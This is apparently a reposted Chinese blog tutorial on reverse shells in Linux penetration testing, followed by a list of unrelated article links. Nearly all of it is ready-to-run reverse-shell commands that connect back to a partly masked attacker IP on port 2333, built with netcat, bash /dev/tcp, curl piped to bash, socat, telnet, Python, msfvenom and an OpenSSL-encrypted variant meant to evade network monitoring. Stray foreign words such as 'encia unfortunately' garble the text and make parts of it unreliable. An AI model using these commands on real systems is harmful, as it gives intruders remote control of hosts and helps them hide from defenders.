博客
关于我
反弹Shell,看这一篇就够了
阅读量:706 次
发布时间:2019-03-21

本文共 1835 字,大约阅读时间需要 6 分钟。

渗透测试中,Linux系统的反弹shell操作无疑是一个经典且重要的情景。攻击者通过在目标机上建立一个向攻击机转发的反弹通道,能够模拟一个虚拟终端,从而获得对目标系统的远程控制权限。

反弹shell的核心作用在于克服传统正向连接的局限性。例如,当目标机防火墙严格控制出口访问,端口资源受限,或主机位于动态IP环境中时,正向连接往往难以实现。而反弹shell则通过将攻击机指定为服务端,依赖目标机的主动连接,成为突破这些限制的有效武器。

反弹shell的实现方法

反弹shell的具体实现多种多样,常见方式包括:

1. 利用Netcat反弹shell

Netcat(nc)是一款强大的网络测试工具,广泛用于反弹shell。尽管部分发行版限制了其encia unfortunately(-e)参数,攻击者仍可通过手动安装特定版本来利用Netcat反弹shell。

命令示例:

nc -lvvp 2333

攻击机开启监听,目标机执行:

nc 47.xxx.xxx.72 2333 -e /bin/bash

2. Bash反弹shell

Bash可通过标准输入结合重定向实现反弹shell,命令如下:

bash -i > /dev/tcp/47.xxx.xxx.72/2333 0>&1

3. Curl配合Bash反弹shell

借助curl命令,可将反弹shell命令触发为目标机执行:

curl 47.xxx.xxx.72 | bash

4. Socat反弹shell

Socat是一款功能强大的网络工具,用于创建和管理网络连接,反弹shell的实现较为简便。

命令示例:

socat TCP-LISTEN:2333 -

攻击机监听,目标机执行:

socat tcp-connect:47.xxx.xxx.72:2333 exec:/bin/bash

5. Telnet反弹shell

在支持Telnet的目标机上,可通过Telnet客户端实现反弹shell。

命令示例(目标机执行):

telnet 47.xxx.xxx.72 2333 | /bin/bash

6. Python、PHP、Perl脚本反弹shell

针对目标机具备相应脚本环境,可借助Python、PHP、Perl等语言实现反弹shell。以下是Python示例:

python -c "import socket,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('47.xxx.xxx.72', 2333)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); import sys; sys.stdin = s.makefile(1); sys.stdout = s.makefile(1); import pty; pty.spawn(['/bin/bash'])"

7. menggunakan Metasploit

Metasploit框架提供了生成一句话反弹shell的强大功能。如需生成特定语言反弹shell可执行:

msfvenom -l | grep cmd/unix/reverse

目标机执行生成的payload即可实现反弹shell。

OpenSSL反弹加密shell

传统反弹shell的通信流量为明文,易被网络防护设备发现。使用OpenSSL,攻击者可在反弹过程中加入加密层,克服这一限制。

配置步骤:

  • 在攻击机生成自签名证书:
  • openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
    1. 在攻击机监听:
    2. openssl s_server -quiet -key key.pem -cert cert.pem -port 2333
      1. 在目标机执行反弹shell:
      2. mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.xxx.xxx.72:2333 > /tmp/s; rm /tmp/s

        通过以上方法,攻击者可根据目标环境选择最适合的手段,成功实现反弹shell,获取目标系统的控制权限。

    转载地址:http://hutez.baihongyu.com/

    你可能感兴趣的文章
    Nginx配置实例-动静分离实例:搭建静态资源服务器
    查看>>
    Nginx配置实例-反向代理实例:根据访问的路径跳转到不同端口的服务中
    查看>>
    Nginx配置实例-负载均衡实例:平均访问多台服务器
    查看>>
    Nginx配置文件nginx.conf中文详解(总结)
    查看>>
    nginx配置详解、端口重定向和504
    查看>>
    Nginx配置负载均衡到后台网关集群
    查看>>
    Nginx配置限流,技能拉满!
    查看>>
    Nginx面试三连问:Nginx如何工作?负载均衡策略有哪些?如何限流?
    查看>>
    Nginx:NginxConfig可视化配置工具安装
    查看>>
    ngModelController
    查看>>
    ngrok | 内网穿透,支持 HTTPS、国内访问、静态域名
    查看>>
    ngrok内网穿透可以实现资源共享吗?快解析更加简洁
    查看>>
    NHibernate学习[1]
    查看>>
    NHibernate异常:No persister for的解决办法
    查看>>
    NIFI1.21.0_java.net.SocketException:_Too many open files 打开的文件太多_实际操作---大数据之Nifi工作笔记0051
    查看>>
    NIFI1.21.0_Mysql到Mysql增量CDC同步中_日期类型_以及null数据同步处理补充---大数据之Nifi工作笔记0057
    查看>>
    NIFI1.21.0_Mysql到Mysql增量CDC同步中_补充_更新时如果目标表中不存在记录就改为插入数据_Postgresql_Hbase也适用---大数据之Nifi工作笔记0059
    查看>>
    NIFI1.21.0_NIFI和hadoop蹦了_200G集群磁盘又满了_Jps看不到进程了_Unable to write in /tmp. Aborting----大数据之Nifi工作笔记0052
    查看>>
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_增删改数据分发及删除数据实时同步_通过分页解决变更记录过大问题_02----大数据之Nifi工作笔记0054
    查看>>
    NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_插入修改删除增量数据实时同步_通过分页解决变更记录过大问题_01----大数据之Nifi工作笔记0053
    查看>>